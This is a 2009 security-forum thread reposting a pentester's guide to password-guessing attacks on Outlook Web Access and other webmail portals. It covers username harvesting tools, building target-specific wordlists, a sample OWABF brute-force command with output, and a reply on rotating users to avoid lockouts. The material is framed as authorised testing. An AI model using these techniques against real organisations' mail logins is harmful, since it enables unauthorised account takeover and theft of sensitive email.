.

Attacking outlook web portals

<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Aug 24, 2009 2:57 pm

Attacking outlook web portals

From a co-worker of mine at Redspin, working links at the site:

http://www.redspin.com/blog/2009/08/04/ ... -accounts/

Webmail is absolutely everywhere.  I rarely come across a corporate network that doesn’t have Outlook Web Access, Groupwise, or some other variant of webmail listening.  Being able to get at email accounts from the Internet can save employees a lot of time and headache, but using those accounts with weak passwords can result in an even larger headache.  Knowing how the majority of the planet uses email (sending some pretty sensitive data) this creates a large risk for most any company.  I’ll run through a quick list of tools and processes that I use to test the strength of webmail logins.

The first part of any password attack is gathering valid usernames.  For attacks against webmail, this usually means scouring the target’s web sites looking for either specific usernames, or the naming structure for their accounts.  The latter is easy – you can dig through the targets website and collect names of employees, and rewrite them to fit the company’s standard account naming policy(Joe User becomes joe.user, juser, joeuser,  etc).  There are also  some tools that automate the gathering of this information:

Metagoofil – Metagoofil will search a particular domain or website, download all the documents from it, and parse the metadata looking for usernames, internal file locations, and lots of other info.  You can get an absolutely incredible amount of information from metadata.
FOCA – Much like Metagoofil, but appears to strip out even more information from documents.  This tool recently debuted at Defcon17.
theHarvester – This tool also does a good job of utilizing search engines to gather email addresses and usernames.  It searches social networking sites, the PGP key repositories, and uses general search engine tactics as well.
There are many other ways to enumerate usernames from public resources,  but these tools should give a good starting point.  Use them in combination along with some manual searching to create a username list.

Once we have our list of users, we can move on to creating a password list.  There are many ways to construct a valid password list for a specific target.  I like to start by grabbing the DPL (Default Password List) and stripping out any vendor specific stuff.  Ill then add in the old favorites such as all the variations on Password1.  Then, ill start looking for some more specific words.  Ill do some research on the target, and include things like the business name, local sports teams, addresses and universities.  Ill then use a application like John the Ripper to run permutations on the list we just created.  John lets you specify custom permutations rules, and can take the word ‘redspin’ and output redspin, Redspin, red-spin, redspin1, Red-spin1, etc.

Now that we have some valid usernames and a relevant password list, we can move into the attack.  There are few tools to help automate password attacks against webmail login pages, but the few that exist are quite handy:

OWABF – Outlook Web Access Brute Force.  A nice script that automates attacks against Outlook Web Access.
WMAT – Web Mail Auth Tool.  A tool that supports multiple ‘patterns’ for setting up attacks against different webmail services.  It currently includes patterns for horde, hordeIMP, kerio, mdaemon and squirrelmail.  The structure is pretty easy to write new patterns for if you need to test a unique login page.
That’s all there is to it.  We have collected valid usernames from the target, created some customized password lists, and have listed some tools you can use to tie it all together.  One thing to keep in mind is the use of lockout policies.  The last thing you want to do it lock out a bunch of live email accounts, so unless you know the lockout threshold (if there is one), you might want to limit the password guesses per account to something sane.


$ python owabf.py -s https://webmail.example.com -u userlist -p top100.pass
***********************************
***    OWA Brute Forcer    ***
***    OWABF v 1.3        ***
***    Dejan Levaja        ***
***    http://www.netsec.rs&nbsp;   ***
***    dejan.levaja@netsec.rs    ***
***********************************
Outlook Web Access Brute Forcer
Login unsuccessful
joe.user    654321
Login unsuccessful
joe.user    abc12345
Login unsuccessful
joe.user    123456
Login unsuccessful
joe.user    Password?
Login unsuccessful
joe.user    password
Login unsuccessful
joe.user    welcome1
Login unsuccessful
joe.user    Password1
Login unsuccessful
joe.user    Mailbox1
...
<<

Bane

Post Mon Aug 24, 2009 3:05 pm

Re: Attacking outlook web portals

Nice article. Some interesting tools there for sure, like FOCA and the webmail scripts.
<<

jason

User avatar

Hero Member
Hero Member

Posts: 1013

Joined: Sat Jun 21, 2008 6:23 pm

Location: USA

Post Mon Aug 24, 2009 7:47 pm

Re: Attacking outlook web portals

Good one J. I hadn't seen OWABF before, have to check it out. Does your co-worker post here?
<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Aug 24, 2009 8:05 pm

Re: Attacking outlook web portals

No not currently but ill give him the nudge to come over :P
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Aug 24, 2009 9:42 pm

Re: Attacking outlook web portals

It would be pretty easy to modify the script to rotate users to help with lock out issues.  Perhaps attempt 2 guesses per user and then move on.  This would be particularly effective for larger organizations.  It looks like there is already a wait period incorporated. 

This is pretty funny:

  Code:
# TODO:
# Learn Python :)


I am in the same boat.  I would write this using CURL and something other than python :)

Very nice script and very simple. 
~~~~~~~~~~~~~~
Ketchup
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Tue Aug 25, 2009 12:20 am

Re: Attacking outlook web portals

Thanks for sharing, Jhaddix. Some more tools which caught my attention.

Return to Tutorials

Who is online

Users browsing this forum: No registered users and 2 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software